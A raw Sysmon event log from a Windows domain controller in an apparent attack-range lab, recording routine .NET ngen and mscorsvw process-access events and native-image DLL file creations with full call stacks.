.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:23.295{59A5CD1D-91A6-6005-EE02-00000000A301}4100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1004-0\UIAutomationClientsideProviders.dll2021-01-18 13:48:23.295 10341000x80000000000000007193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.654{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A8-6005-F902-00000000A301}3152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.654{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91A8-6005-F902-00000000A301}3152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:24.654{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A8-6005-F902-00000000A301}3152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.591{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A8-6005-F802-00000000A301}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.576{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91A8-6005-F802-00000000A301}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.576{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A8-6005-F802-00000000A301}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.544{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A8-6005-F702-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.544{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A8-6005-F702-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:24.544{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A8-6005-F702-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:24.451{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A8-6005-F602-00000000A301}4764C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.435{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91A8-6005-F602-00000000A301}4764C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:24.435{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A8-6005-F602-00000000A301}4764C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:24.373{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A8-6005-F502-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.357{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A8-6005-F502-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:24.357{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A8-6005-F502-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:24.294{59A5CD1D-91A8-6005-F402-00000000A301}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12bc-0\WindowsFormsIntegration.dll2021-01-18 13:48:24.294 10341000x80000000000000007177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:24.044{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A8-6005-F402-00000000A301}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.044{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91A8-6005-F402-00000000A301}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:24.044{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A8-6005-F402-00000000A301}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.998{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A7-6005-F302-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
11241100x80000000000000007201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:25.373{59A5CD1D-91A9-6005-FB02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\6dc-0\XsdBuildTask.dll2021-01-18 13:48:25.373 10341000x80000000000000007200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:25.216{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A9-6005-FB02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:25.201{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91A9-6005-FB02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:25.201{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A9-6005-FB02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:25.154{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A9-6005-FA02-00000000A301}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:25.154{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A9-6005-FA02-00000000A301}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 